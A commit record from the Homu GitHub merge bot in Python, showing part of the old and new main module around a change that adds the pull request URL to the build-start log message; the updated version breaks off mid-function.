def __lt__(self, other):
return self.sort_key() < other.sort_key()
def add_comment(self, text):
issue = getattr(self, 'issue', None)
if not issue:
issue = self.issue = self.get_repo().issue(self.num)
issue.create_comment(text)
def set_status(self, status):
self.status = status
sql = 'UPDATE pull SET status = %s WHERE repo = %s AND num = %s'
with self.db.get_connection() as db_conn:
db_conn.cursor().execute(sql, [self.status, self.repo_label,
self.num])
db_conn.commit()
# FIXME: self.try_ should also be saved in the database
if not self.try_:
sql = 'UPDATE pull SET merge_sha = %s WHERE repo = %s AND num = %s'
db_conn.cursor().execute(sql, [self.merge_sha, self.repo_label,
self.num])
db_conn.commit()
def get_status(self):
return 'approved' if self.status == '' and self.approved_by and self.mergeable is not False else self.status
def set_mergeable(self, mergeable, *, cause=None, que=True):
if mergeable is not None:
self.mergeable = mergeable
sql = 'REPLACE INTO mergeable (repo, num, mergeable) ' \
'VALUES (%s, %s, %s)'
with self.db.get_connection() as db_conn:
db_conn.cursor().execute(sql, [self.repo_label, self.num,
self.mergeable])
db_conn.commit()
else:
if que:
self.mergeable_que.put([self, cause])
else:
self.mergeable = None
with self.db.get_connection() as db_conn:
sql = 'DELETE FROM mergeable WHERE repo = %s AND num = %s'
db_conn.cursor().execute(sql, [self.repo_label, self.num])
db_conn.commit()
def init_build_res(self, builders, *, use_db=True):
self.build_res = {x: {
'res': None,
'url': '',
} for x in builders}
if use_db:
with self.db.get_connection() as db_conn:
sql = 'DELETE FROM build_res WHERE repo = %s AND num = %s'
db_conn.cursor().execute(sql, [self.repo_label, self.num])
db_conn.commit()
def set_build_res(self, builder, res, url):
if builder not in self.build_res:
raise Exception('Invalid builder: {}'.format(builder))
self.build_res[builder] = {
'res': res,
'url': url,
}
with self.db.get_connection() as db_conn:
db_conn.cursor().execute('REPLACE INTO build_res ' \
'(repo, num, builder, res, url, ' \
'merge_sha) VALUES ' \
'(%s, %s, %s, %s, %s, %s)',
[self.repo_label, self.num, builder, res,
url, self.merge_sha])
db_conn.commit()
def build_res_summary(self):
return ', '.join('{}: {}'.format(builder, data['res'])
for builder, data in self.build_res.items())
def get_repo(self):
repo = self.repos[self.repo_label]
if not repo:
self.repos[self.repo_label] = repo = self.gh.repository(self.owner, self.name)
assert repo.owner.login == self.owner
assert repo.name == self.name
return repo
def save(self):
with self.db.get_connection() as db_conn:
db_conn.cursor().execute('REPLACE INTO pull ' \
'(repo, num, status, merge_sha, title, ' \
'body, head_sha, head_ref, base_ref, ' \
'assignee, approved_by, priority, ' \
'try_, rollup) VALUES (%s, %s, %s, %s, ' \
'%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)',
[self.repo_label, self.num, self.status,
self.merge_sha, self.title, self.body,
self.head_sha, self.head_ref,
self.base_ref, self.assignee,
self.approved_by, self.priority,
self.try_, self.rollup])
db_conn.commit()
def refresh(self):
issue = self.get_repo().issue(self.num)
self.title = issue.title
self.body = issue.body
def sha_cmp(short, full):
return len(short) >= 4 and short == full[:len(short)]
def sha_or_blank(sha):
return sha if re.match(r'^[0-9a-f]+$', sha) else ''
def parse_commands(body, username, repo_cfg, state, my_username, *,
realtime=False, sha=''):
if 'ALL' != repo_cfg['reviewers'] and \
username not in repo_cfg['reviewers'] and \
username != my_username:
return False
state_changed = False
words = list(chain.from_iterable(re.findall(r'\S+', x) for x in body.splitlines() if '@' + my_username in x))
for i, word in reversed(list(enumerate(words))):
found = True
if word == 'r+' or word.startswith('r='):
if not sha and i+1 < len(words):
cur_sha = sha_or_blank(words[i+1])
else:
cur_sha = sha
approver = word[len('r='):] if word.startswith('r=') else username
if sha_cmp(cur_sha, state.head_sha):
state.approved_by = approver
state.save()
elif realtime and username != my_username:
if cur_sha:
msg = '`{}` is not a valid commit SHA.'.format(cur_sha)
state.add_comment(':question: {} Please try again with '
'`{:.7}`.'.format(msg, state.head_sha))
else:
state.add_comment(':pushpin: Commit {:.7} has been approved by `{}`\n\n<!-- @{} r={} {} -->'.format(state.head_sha, approver, my_username, approver, state.head_sha))
elif word == 'r-':
state.approved_by = ''
state.save()
elif word.startswith('p='):
try: state.priority = int(word[len('p='):])
except ValueError: pass
state.save()
elif word == 'retry' and realtime:
state.set_status('')
elif word in ['try', 'try-'] and realtime:
state.try_ = word == 'try'
state.merge_sha = ''
state.init_build_res([])
state.save()
elif word in ['rollup', 'rollup-']:
state.rollup = word == 'rollup'
state.save()
elif word == 'force' and realtime:
with buildbot_sess(repo_cfg) as sess:
res = sess.post(repo_cfg['buildbot']['url'] + '/builders/_selected/stopselected', allow_redirects=False, data={
'selected': repo_cfg['buildbot']['builders'],
'comments': INTERRUPTED_BY_HOMU_FMT.format(int(time.time())),
})
if 'authzfail' in res.text:
err = 'Authorization failed'
else:
mat = re.search('(?s)<div class="error">(.*?)</div>', res.text)
if mat:
err = mat.group(1).strip()
if not err: err = 'Unknown error'
else:
err = ''
if err:
state.add_comment(':bomb: Buildbot returned an error: `{}`'.format(err))
elif word == 'clean' and realtime:
state.merge_sha = ''
state.init_build_res([])
state.save()
else:
found = False
if found:
state_changed = True
words[i] = ''
return state_changed
def create_merge(state, repo_cfg, trigger_author_cfg, branch, gh):
def report_error(desc):
state.set_status('error')
utils.github_create_status(state.get_repo(), state.head_sha, 'error',
'', desc[:140], context='merge-test')
state.add_comment(':x: {}'.format(desc))
base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
utils.github_set_ref(
state.get_repo(),
'heads/' + branch,
base_sha,
force=True,
)
state.refresh()
merge_msg = 'Auto merge of #{} - {}, r={}\n\n{}'.format(
state.num,
state.head_ref,
'<try>' if state.try_ else state.approved_by,
state.title)
try: merge_commit = state.get_repo().merge(branch, state.head_sha, merge_msg)
except github3.models.GitHubError as e:
if e.code != 409: raise
report_error('Merge conflict')
return None
# Solano's CI Mode can be set either to PR or ON. In ON mode, it
# builds on every branch update, which means it gets triggered on
# the above call to github_set_ref. We must therefore issue a PR on
# the merge node, in order to only trigger Solano to build on the
# intended node.
db = Database()
message = 'Build trigger for {}'.format(merge_msg)
pr_branch_name = '{}_build_trigger_{}'.format(branch, merge_commit.sha)
pr_branch = utils.github_set_ref(repo=state.get_repo(),
ref='heads/{}'.format(pr_branch_name),
sha=merge_commit.sha,
force=True)
if pr_branch:
author = {'name': trigger_author_cfg.get('name', 'homu'),
'email': trigger_author_cfg.get('email', 'homu@invalid'),
'date': datetime.now(timezone.utc).isoformat()}
created_file = state.get_repo().create_file(path='zero',
message=message,
content=b'0',
branch=pr_branch_name,
committer=author,
author=author)
if 'commit' in created_file:
commit = created_file.get('commit')
time.sleep(2) # GitHub sometimes needs a moment here.
try:
pr = state.get_repo().create_pull(title=message,
base=branch,
head=pr_branch_name)
except github3.models.GitHubError as e0:
for e1 in e0.errors:
report_error(e1['message'])
pr = None
if pr:
with db.get_connection() as db_conn:
try:
build_count = len(repo_cfg['testrunners']['builders'])
except KeyError:
build_count = 0
sql = 'REPLACE INTO build_triggers ' \
'(branch, trigger_sha, target_sha, build_count) ' \
'VALUES (%s, %s, %s, %s)'
db_conn.cursor().execute(sql, [pr_branch_name,
commit.sha,
merge_commit.sha,
build_count])
db_conn.commit()
else:
report_error('Failed to create pull.')
else:
report_error('Failed to create commit.')
else:
report_error('Failed to create PR branch.')
return merge_commit
def start_build(state, repo_cfgs, trigger_author_cfg, buildbot_slots, logger, gh):
if buildbot_slots[0]:
return True
assert state.head_sha == state.get_repo().pull_request(state.num).head.sha
repo_cfg = repo_cfgs[state.repo_label]
if 'buildbot' in repo_cfg:
branch = 'try' if state.try_ else 'auto'
branch = repo_cfg.get('branch', {}).get(branch, branch)
builders = repo_cfg['buildbot']['try_builders' if state.try_ else 'builders']
elif 'travis' in repo_cfg:
branch = repo_cfg.get('branch', {}).get('auto', 'auto')
builders = ['travis']
elif 'status' in repo_cfg:
branch = repo_cfg.get('branch', {}).get('auto', 'auto')
builders = ['status']
elif 'testrunners' in repo_cfg:
branch = 'merge_bot_{}'.format(state.base_ref)
builders = repo_cfg['testrunners'].get('builders', [])
else:
raise RuntimeError('Invalid configuration')
merge_commit = create_merge(state, repo_cfg, trigger_author_cfg, branch, gh)
if not merge_commit:
return False
state.init_build_res(builders)
state.merge_sha = merge_commit.sha
state.save()
if 'buildbot' in repo_cfg:
buildbot_slots[0] = state.merge_sha
logger.info('Starting build of {}/{}#{} on {}: {}'.format(state.owner,
state.name,
state.num,
branch,
state.merge_sha))
state.set_status('pending')
desc = '{} commit {:.7} with merge {:.7}...'.format('Trying' if state.try_ else 'Testing', state.head_sha, state.merge_sha)
github_create_status = partial(utils.github_create_status,
repo=state.get_repo(),
sha=state.head_sha,
state='pending',
description=desc)
if 'testrunners' in repo_cfg:
for builder in builders:
github_create_status(context='merge-test/{}'.format(builder))
else:
github_create_status(context='homu')
state.add_comment(':hourglass: ' + desc)
return True
def start_rebuild(state, repo_cfgs):
repo_cfg = repo_cfgs[state.repo_label]
if 'buildbot' not in repo_cfg or not state.build_res:
return False
builders = []
succ_builders = []
for builder, info in state.build_res.items():
if not info['url']:
return False
if info['res']:
succ_builders.append([builder, info['url']])
else:
builders.append([builder, info['url']])
if not builders or not succ_builders:
return False
base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
parent_shas = [x['sha'] for x in state.get_repo().commit(state.merge_sha).parents]
if base_sha not in parent_shas:
return False
utils.github_set_ref(state.get_repo(), 'tags/homu-tmp', state.merge_sha, force=True)
builders.sort()
succ_builders.sort()
with buildbot_sess(repo_cfg) as sess:
for builder, url in builders:
res = sess.post(url + '/rebuild', allow_redirects=False, data={
'useSourcestamp': 'exact',
'comments': 'Initiated by Homu',
})
if 'authzfail' in res.text:
err = 'Authorization failed'
elif builder in res.text:
err = ''
else:
mat = re.search('<title>(.+?)</title>', res.text)
err = mat.group(1) if mat else 'Unknown error'
if err:
state.add_comment(':bomb: Failed to start rebuilding: `{}`'.format(err))
return False
state.set_status('pending')
msg_1 = 'Previous build results'
msg_2 = ' for {}'.format(', '.join('[{}]({})'.format(builder, url) for builder, url in succ_builders))
msg_3 = ' are reusable. Rebuilding'
msg_4 = ' only {}'.format(', '.join('[{}]({})'.format(builder, url) for builder, url in builders))
utils.github_create_status(state.get_repo(), state.head_sha, 'pending', '', '{}{}...'.format(msg_1, msg_3), context='homu')
state.add_comment(':zap: {}{}{}{}...'.format(msg_1, msg_2, msg_3, msg_4))
return True
def start_build_or_rebuild(state, repo_cfgs, trigger_author_cfg, gh, *args):
if start_rebuild(state, repo_cfgs):
return True
return start_build(state, repo_cfgs, trigger_author_cfg, gh, *args)
def process_queue(states, repos, repo_cfgs, trigger_author_cfg, logger,
buildbot_slots, gh):
for repo_label, repo in repos.items():
repo_states = sorted(states[repo_label].values())
for state in repo_states:
if state.status == 'pending' and not state.try_:
break
elif state.status == '' and state.approved_by:
if start_build_or_rebuild(state, repo_cfgs, trigger_author_cfg,
buildbot_slots, logger, gh):
return
elif state.status == 'success' and state.try_ and state.approved_by:
state.try_ = False
state.save()
if start_build(state, repo_cfgs, trigger_author_cfg, buildbot_slots, logger, gh):
return
for state in repo_states:
if state.status == '' and state.try_:
if start_build(state, repo_cfgs, trigger_author_cfg, buildbot_slots, logger, gh):
return
def fetch_mergeability(mergeable_que):
re_pull_num = re.compile('(?i)merge (?:of|pull request) #([0-9]+)')
while True:
try:
state, cause = mergeable_que.get()
pr = state.get_repo().pull_request(state.num)
if pr is None:
time.sleep(5)
pr = state.get_repo().pull_request(state.num)
mergeable = pr.mergeable
if mergeable is None:
time.sleep(5)
mergeable = pr.mergeable
if state.mergeable is True and mergeable is False:
if cause:
mat = re_pull_num.search(cause['title'])
if mat: issue_or_commit = '#' + mat.group(1)
else: issue_or_commit = cause['sha'][:7]
issue_or_commit = \
' (presumably {})'.format(issue_or_commit)
else:
issue_or_commit = ''
state.add_comment(':x: The latest upstream changes{} made '
'this pull request unmergeable. Please resolve the merge '
'conflicts.'.format(issue_or_commit))
state.set_mergeable(mergeable, que=False)
except:
traceback.print_exc()
finally:
mergeable_que.task_done()
def synchronize(repo_label, repo_cfg, logger, gh, states, repos, mergeable_que,
my_username, repo_labels):
logger.info('Synchronizing {}...'.format(repo_label))
db = Database()
repo = gh.repository(repo_cfg['owner'], repo_cfg['name'])
# XXX This is dangerous. We have a publicly exposed method to desrtoy state.
with db.get_connection() as db_conn:
for tbl in ['pull', 'build_res', 'mergeable']:
sql = 'DELETE FROM {} WHERE repo = %s'.format(tbl)
db_conn.cursor().execute(sql, [repo_label])
db_conn.commit()
states[repo_label] = {}
repos[repo_label] = repo
for pull in repo.iter_pulls(state='open'):
# Ignore PRs older than about two months.
update_delta = datetime.now(timezone.utc) - pull.updated_at
if 5e6 < update_delta.total_seconds():
logger.debug('Ignoring PR for merge {} because it has not ' \
'been updated since {}.'.format(pull.merge_commit_sha,
pull.updated_at))
continue
with db.get_connection() as db_conn:
cursor = db_conn.cursor()
sql = 'SELECT status FROM pull WHERE repo = %s AND num = %s'
cursor.execute(sql, [repo_label, pull.number])
row = cursor.fetchone()
if row:
status = row[0]
else:
status = ''
for info in utils.github_iter_statuses(repo, pull.head.sha):
if info.context == 'homu':
status = info.state
break
state = PullReqState(pull.number, pull.head.sha, status, repo_label,
mergeable_que, gh, repo_cfg['owner'],
repo_cfg['name'], repos)
state.title = pull.title
state.body = pull.body
state.head_ref = pull.head.repo[0] + ':' + pull.head.ref
state.base_ref = pull.base.ref
state.set_mergeable(None)
state.assignee = pull.assignee.login if pull.assignee else ''
for comment in pull.iter_comments():
if comment.original_commit_id == pull.head.sha:
parse_commands(
comment.body,
comment.user.login,
repo_cfg,
state,
my_username,
sha=comment.original_commit_id,
)
for comment in pull.iter_issue_comments():
parse_commands(
comment.body,
comment.user.login,
repo_cfg,
state,
my_username,
)
state.save()
states[repo_label][pull.number] = state
logger.info('Done synchronizing {}!'.format(repo_label))
logger.debug('Github rate limit status: {}'.format(gh.rate_limit()))
def arguments():
parser = argparse.ArgumentParser(description =
'A bot that integrates with GitHub and '
'your favorite continuous integration service')
parser.add_argument('-v', '--verbose',
action='store_true', help='Enable more verbose logging')
return parser.parse_args()
def main():
args = arguments()
logger = logging.getLogger('homu')
logger.setLevel(logging.DEBUG if args.verbose else logging.INFO)
logger.addHandler(logging.StreamHandler())
try:
with open('cfg.toml') as fp:
cfg = toml.loads(fp.read())
except FileNotFoundError:
with open('cfg.json') as fp:
cfg = json.loads(fp.read())
trigger_author_cfg = cfg.get('trigger_author', {})
gh = github3.login(token=cfg['github']['access_token'])
rate_limit = gh.rate_limit()
logger.debug('Github rate limit status: {}'.format(rate_limit))
if not rate_limit['rate']['remaining']:
reset_time = datetime.fromtimestamp(rate_limit['rate']['reset'])
logger_msg = 'Github rate limit exhausted! Sleeping until {}'
logger.info(logger_msg.format(reset_time.isoformat()))
reset_delta = reset_time - datetime.now()
time.sleep(reset_delta.total_seconds())
states = {}
repos = {}
repo_cfgs = {}
buildbot_slots = ['']
my_username = gh.user().login
repo_labels = {}
mergeable_que = Queue()
db = Database()
with db.get_connection() as db_conn:
schema_path = os.path.join(os.path.dirname(__file__), 'schema.sql')
schema = open(schema_path).read()
# execute with multi=True requires enumeration.
list(db_conn.cursor().execute(multi=True, operation=schema))
for repo_label, repo_cfg in cfg['repo'].items():
repo_cfgs[repo_label] = repo_cfg
repo_labels[repo_cfg['owner'], repo_cfg['name']] = repo_label
repo_states = {}
repos[repo_label] = None
cursor = db_conn.cursor()
cursor.execute('SELECT num, head_sha, status, title, body, ' \
'head_ref, base_ref, assignee, approved_by, ' \
'priority, try_, rollup, merge_sha FROM pull ' \
'WHERE repo = %s', [repo_label])
for (num, head_sha, status, title, body, head_ref, base_ref,
assignee, approved_by, priority, try_, rollup,
merge_sha) in cursor.fetchall():
state = PullReqState(num, head_sha, status, repo_label,
mergeable_que, gh, repo_cfg['owner'],
repo_cfg['name'], repos)
state.title = title
state.body = body
state.head_ref = head_ref
state.base_ref = base_ref
state.set_mergeable(None)
state.assignee = assignee
state.approved_by = approved_by
state.priority = int(priority)
state.try_ = bool(try_)
state.rollup = bool(rollup)
if merge_sha:
if 'buildbot' in repo_cfg:
builders = repo_cfg['buildbot']['builders']
elif 'travis' in repo_cfg:
builders = ['travis']
elif 'status' in repo_cfg:
builders = ['status']
elif 'testrunners' in repo_cfg:
builders = repo_cfg['testrunners'].get('builders', [])
else:
raise RuntimeError('Invalid configuration')
state.init_build_res(builders, use_db=False)
state.merge_sha = merge_sha
elif state.status == 'pending':
# FIXME: There might be a better solution
state.status = ''
state.save()
repo_states[num] = state
states[repo_label] = repo_states
cursor = db_conn.cursor()
cursor.execute('SELECT repo, num, builder, res, url, merge_sha FROM build_res')
for repo_label, num, builder, res, url, merge_sha in cursor.fetchall():
try:
state = states[repo_label][num]
if builder not in state.build_res: raise KeyError
if state.merge_sha != merge_sha: raise KeyError
except KeyError:
cursor = db_conn.cursor()
cursor.execute('DELETE FROM build_res WHERE repo = %s AND ' \
'num = %s AND builder = %s',
[repo_label, num, builder])
db_conn.commit()
continue
state.build_res[builder] = {
'res': bool(res) if res is not None else None,
'url': url,
}
cursor = db_conn.cursor()
cursor.execute('SELECT repo, num, mergeable FROM mergeable')
for repo_label, num, mergeable in cursor.fetchall():
try: state = states[repo_label][num]
except KeyError:
cursor = db_conn.cursor()
cursor.execute('DELETE FROM mergeable WHERE repo = %s AND ' \
'num = %s', [repo_label, num])
db_conn.commit()
continue
state.mergeable = bool(mergeable) if mergeable is not None else None
queue_handler_lock = Lock()
def queue_handler():
with queue_handler_lock:
return process_queue(states, repos, repo_cfgs,
trigger_author_cfg, logger,
buildbot_slots, gh)
from . import server
Thread(target=server.start, args=[cfg, states, queue_handler, repo_cfgs,
repos, logger, buildbot_slots,
my_username, repo_labels,
mergeable_que, gh]).start()
Thread(target=fetch_mergeability, args=[mergeable_que]).start()
for repo_label, repo_cfg in cfg['repo'].items():
t = Thread(target=synchronize,
args=[repo_label, repo_cfg, logger, gh, states, repos,
mergeable_que, my_username, repo_labels])
t.start()
queue_handler()
if __name__ == '__main__':
signal.signal(signal.SIGTERM, lambda x, y: Database().close_all())
main()
Include PR URL in log message when starting a build.
import argparse
from datetime import datetime, timezone
import github3
import os
import toml
import json
import re
from .database import Database
from . import utils
import logging
from threading import Thread, Lock
import time
import traceback
import requests
from contextlib import contextmanager
from functools import partial
from itertools import chain
from queue import Queue
import signal
STATUS_TO_PRIORITY = {
'success': 0,
'pending': 1,
'approved': 2,
'': 3,
'error': 4,
'failure': 5,
}
INTERRUPTED_BY_HOMU_FMT = 'Interrupted by Homu ({})'
INTERRUPTED_BY_HOMU_RE = re.compile(r'Interrupted by Homu \((.+?)\)')
@contextmanager
def buildbot_sess(repo_cfg):
sess = requests.Session()
sess.post(repo_cfg['buildbot']['url'] + '/login', allow_redirects=False, data={
'username': repo_cfg['buildbot']['username'],
'passwd': repo_cfg['buildbot']['password'],
})
yield sess
sess.get(repo_cfg['buildbot']['url'] + '/logout', allow_redirects=False)
class PullReqState:
num = 0
priority = 0
rollup = False
title = ''
body = ''
head_ref = ''
base_ref = ''
assignee = ''
def __init__(self, num, head_sha, status, repo_label, mergeable_que, gh,
owner, name, repos):
self.head_advanced('', use_db=False)
self.num = num
self.head_sha = head_sha
self.status = status
self.repo_label = repo_label
self.mergeable_que = mergeable_que
self.gh = gh
self.owner = owner
self.name = name
self.repos = repos
self.db = Database()
def head_advanced(self, head_sha, *, use_db=True):
self.head_sha = head_sha
self.approved_by = ''
self.status = ''
self.merge_sha = ''
self.build_res = {}
self.try_ = False
self.mergeable = None
if use_db:
self.set_status('')
self.set_mergeable(None)
self.init_build_res([])
def __repr__(self):
return 'PullReqState:{}/{}#{}(approved_by={}, priority={}, status={})'.format(
self.owner,
self.name,
self.num,
self.approved_by,
self.priority,
self.status,
)
def sort_key(self):
return [
STATUS_TO_PRIORITY.get(self.get_status(), -1),
1 if self.mergeable is False else 0,
0 if self.approved_by else 1,
1 if self.rollup else 0,
-self.priority,
self.num,
]
def __lt__(self, other):
return self.sort_key() < other.sort_key()
def add_comment(self, text):
issue = getattr(self, 'issue', None)
if not issue:
issue = self.issue = self.get_repo().issue(self.num)
issue.create_comment(text)
def set_status(self, status):
self.status = status
sql = 'UPDATE pull SET status = %s WHERE repo = %s AND num = %s'
with self.db.get_connection() as db_conn:
db_conn.cursor().execute(sql, [self.status, self.repo_label,
self.num])
db_conn.commit()
# FIXME: self.try_ should also be saved in the database
if not self.try_:
sql = 'UPDATE pull SET merge_sha = %s WHERE repo = %s AND num = %s'
db_conn.cursor().execute(sql, [self.merge_sha, self.repo_label,
self.num])
db_conn.commit()
def get_status(self):
return 'approved' if self.status == '' and self.approved_by and self.mergeable is not False else self.status
def set_mergeable(self, mergeable, *, cause=None, que=True):
if mergeable is not None:
self.mergeable = mergeable
sql = 'REPLACE INTO mergeable (repo, num, mergeable) ' \
'VALUES (%s, %s, %s)'
with self.db.get_connection() as db_conn:
db_conn.cursor().execute(sql, [self.repo_label, self.num,
self.mergeable])
db_conn.commit()
else:
if que:
self.mergeable_que.put([self, cause])
else:
self.mergeable = None
with self.db.get_connection() as db_conn:
sql = 'DELETE FROM mergeable WHERE repo = %s AND num = %s'
db_conn.cursor().execute(sql, [self.repo_label, self.num])
db_conn.commit()
def init_build_res(self, builders, *, use_db=True):
self.build_res = {x: {
'res': None,
'url': '',
} for x in builders}
if use_db:
with self.db.get_connection() as db_conn:
sql = 'DELETE FROM build_res WHERE repo = %s AND num = %s'
db_conn.cursor().execute(sql, [self.repo_label, self.num])
db_conn.commit()
def set_build_res(self, builder, res, url):
if builder not in self.build_res:
raise Exception('Invalid builder: {}'.format(builder))
self.build_res[builder] = {
'res': res,
'url': url,
}
with self.db.get_connection() as db_conn:
db_conn.cursor().execute('REPLACE INTO build_res ' \
'(repo, num, builder, res, url, ' \
'merge_sha) VALUES ' \
'(%s, %s, %s, %s, %s, %s)',
[self.repo_label, self.num, builder, res,
url, self.merge_sha])
db_conn.commit()
def build_res_summary(self):
return ', '.join('{}: {}'.format(builder, data['res'])
for builder, data in self.build_res.items())
def get_repo(self):
repo = self.repos[self.repo_label]
if not repo:
self.repos[self.repo_label] = repo = self.gh.repository(self.owner, self.name)
assert repo.owner.login == self.owner
assert repo.name == self.name
return repo
def save(self):
with self.db.get_connection() as db_conn:
db_conn.cursor().execute('REPLACE INTO pull ' \
'(repo, num, status, merge_sha, title, ' \
'body, head_sha, head_ref, base_ref, ' \
'assignee, approved_by, priority, ' \
'try_, rollup) VALUES (%s, %s, %s, %s, ' \
'%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)',
[self.repo_label, self.num, self.status,
self.merge_sha, self.title, self.body,
self.head_sha, self.head_ref,
self.base_ref, self.assignee,
self.approved_by, self.priority,
self.try_, self.rollup])
db_conn.commit()
def refresh(self):
issue = self.get_repo().issue(self.num)
self.title = issue.title
self.body = issue.body
def sha_cmp(short, full):
return len(short) >= 4 and short == full[:len(short)]
def sha_or_blank(sha):
return sha if re.match(r'^[0-9a-f]+$', sha) else ''
def parse_commands(body, username, repo_cfg, state, my_username, *,
realtime=False, sha=''):
if 'ALL' != repo_cfg['reviewers'] and \
username not in repo_cfg['reviewers'] and \
username != my_username:
return False
state_changed = False
words = list(chain.from_iterable(re.findall(r'\S+', x) for x in body.splitlines() if '@' + my_username in x))
for i, word in reversed(list(enumerate(words))):
found = True
if word == 'r+' or word.startswith('r='):
if not sha and i+1 < len(words):
cur_sha = sha_or_blank(words[i+1])
else:
cur_sha = sha
approver = word[len('r='):] if word.startswith('r=') else username
if sha_cmp(cur_sha, state.head_sha):
state.approved_by = approver
state.save()
elif realtime and username != my_username:
if cur_sha:
msg = '`{}` is not a valid commit SHA.'.format(cur_sha)
state.add_comment(':question: {} Please try again with '
'`{:.7}`.'.format(msg, state.head_sha))
else:
state.add_comment(':pushpin: Commit {:.7} has been approved by `{}`\n\n<!-- @{} r={} {} -->'.format(state.head_sha, approver, my_username, approver, state.head_sha))
elif word == 'r-':
state.approved_by = ''
state.save()
elif word.startswith('p='):
try: state.priority = int(word[len('p='):])
except ValueError: pass
state.save()
elif word == 'retry' and realtime:
state.set_status('')
elif word in ['try', 'try-'] and realtime:
state.try_ = word == 'try'
state.merge_sha = ''
state.init_build_res([])
state.save()
elif word in ['rollup', 'rollup-']:
state.rollup = word == 'rollup'
state.save()
elif word == 'force' and realtime:
with buildbot_sess(repo_cfg) as sess:
res = sess.post(repo_cfg['buildbot']['url'] + '/builders/_selected/stopselected', allow_redirects=False, data={
'selected': repo_cfg['buildbot']['builders'],
'comments': INTERRUPTED_BY_HOMU_FMT.format(int(time.time())),
})
if 'authzfail' in res.text:
err = 'Authorization failed'
else:
mat = re.search('(?s)<div class="error">(.*?)</div>', res.text)
if mat:
err = mat.group(1).strip()
if not err: err = 'Unknown error'
else:
err = ''
if err:
state.add_comment(':bomb: Buildbot returned an error: `{}`'.format(err))
elif word == 'clean' and realtime:
state.merge_sha = ''
state.init_build_res([])
state.save()
else:
found = False
if found:
state_changed = True
words[i] = ''
return state_changed
def create_merge(state, repo_cfg, trigger_author_cfg, branch, gh):
def report_error(desc):
state.set_status('error')
utils.github_create_status(state.get_repo(), state.head_sha, 'error',
'', desc[:140], context='merge-test')
state.add_comment(':x: {}'.format(desc))
base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
utils.github_set_ref(
state.get_repo(),
'heads/' + branch,
base_sha,
force=True,
)
state.refresh()
merge_msg = 'Auto merge of #{} - {}, r={}\n\n{}'.format(
state.num,
state.head_ref,
'<try>' if state.try_ else state.approved_by,
state.title)
try: merge_commit = state.get_repo().merge(branch, state.head_sha, merge_msg)
except github3.models.GitHubError as e:
if e.code != 409: raise
report_error('Merge conflict')
return None
# Solano's CI Mode can be set either to PR or ON. In ON mode, it
# builds on every branch update, which means it gets triggered on
# the above call to github_set_ref. We must therefore issue a PR on
# the merge node, in order to only trigger Solano to build on the
# intended node.
db = Database()
message = 'Build trigger for {}'.format(merge_msg)
pr_branch_name = '{}_build_trigger_{}'.format(branch, merge_commit.sha)
pr_branch = utils.github_set_ref(repo=state.get_repo(),
ref='heads/{}'.format(pr_branch_name),
sha=merge_commit.sha,
force=True)
if pr_branch:
author = {'name': trigger_author_cfg.get('name', 'homu'),
'email': trigger_author_cfg.get('email', 'homu@invalid'),
'date': datetime.now(timezone.utc).isoformat()}
created_file = state.get_repo().create_file(path='zero',
message=message,
content=b'0',
branch=pr_branch_name,
committer=author,
author=author)
if 'commit' in created_file:
commit = created_file.get('commit')
time.sleep(2) # GitHub sometimes needs a moment here.
try:
pr = state.get_repo().create_pull(title=message,
base=branch,
head=pr_branch_name)
except github3.models.GitHubError as e0:
for e1 in e0.errors:
report_error(e1['message'])
pr = None
if pr:
with db.get_connection() as db_conn:
try:
build_count = len(repo_cfg['testrunners']['builders'])
except KeyError:
build_count = 0
sql = 'REPLACE INTO build_triggers ' \
'(branch, trigger_sha, target_sha, build_count) ' \
'VALUES (%s, %s, %s, %s)'
db_conn.cursor().execute(sql, [pr_branch_name,
commit.sha,
merge_commit.sha,
build_count])
db_conn.commit()
else:
report_error('Failed to create pull.')
else:
report_error('Failed to create commit.')
else:
report_error('Failed to create PR branch.')
return merge_commit
def start_build(state, repo_cfgs, trigger_author_cfg, buildbot_slots, logger, gh):
if buildbot_slots[0]:
return True
assert state.head_sha == state.get_repo().pull_request(state.num).head.sha
repo_cfg = repo_cfgs[state.repo_label]
if 'buildbot' in repo_cfg:
branch = 'try' if state.try_ else 'auto'
branch = repo_cfg.get('branch', {}).get(branch, branch)
builders = repo_cfg['buildbot']['try_builders' if state.try_ else 'builders']
elif 'travis' in repo_cfg:
branch = repo_cfg.get('branch', {}).get('auto', 'auto')
builders = ['travis']
elif 'status' in repo_cfg:
branch = repo_cfg.get('branch', {}).get('auto', 'auto')
builders = ['status']
elif 'testrunners' in repo_cfg:
branch = 'merge_bot_{}'.format(state.base_ref)
builders = repo_cfg['testrunners'].get('builders', [])
else:
raise RuntimeError('Invalid configuration')
merge_commit = create_merge(state, repo_cfg, trigger_author_cfg, branch, gh)
if not merge_commit:
return False
state.init_build_res(builders)
state.merge_sha = merge_commit.sha
state.save()
if 'buildbot' in repo_cfg:
buildbot_slots[0] = state.merge_sha
pr_url = state.get_repo().pull_request(state.num).html_url
msg = 'Starting build of {}/{}#{} on {}: {} {}'.format(state.owner,
state.name,
state.num,
branch,
state.merge_sha,
pr_url)
logger.info(msg)
state.set_status('pending')
desc = '{} commit {:.7} with merge {:.7}...'.format('Trying' if state.try_ else 'Testing', state.head_sha, state.merge_sha)
github_create_status = partial(utils.github_create_status,
repo=state.get_repo(),
sha=state.head_sha,
state='pending',
description=desc)
if 'testrunners' in repo_cfg:
for builder in builders:
github_create_status(context='merge-test/{}'.format(builder))
else:
github_create_status(context='homu')
state.add_comment(':hourglass: ' + desc)
return True
def start_rebuild(state, repo_cfgs):
repo_cfg = repo_cfgs[state.repo_label]
if 'buildbot' not in repo_cfg or not state.build_res:
return False
builders = []
succ_builders = []
for builder, info in state.build_res.items():
if not info['url']:
return False
if info['res']:
succ_builders.append([builder, info['url']])
else:
builders.append([builder, info['url']])
if not builders or not succ_builders:
return False
base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
parent_shas = [x['sha'] for x in state.get_repo().commit(state.merge_sha).parents]
if base_sha not in parent_shas:
return False
utils.github_set_ref(state.get_repo(), 'tags/homu-tmp', state.merge_sha, force=True)
builders.sort()
succ_builders.sort()
with buildbot_sess(repo_cfg) as sess:
for builder, url in builders:
res = sess.post(url + '/rebuild', allow_redirects=False, data={
'useSourcestamp': 'exact',
'comments': 'Initiated by Homu',
})
if 'authzfail' in res.text:
err = 'Authorization failed'
elif builder in res.text:
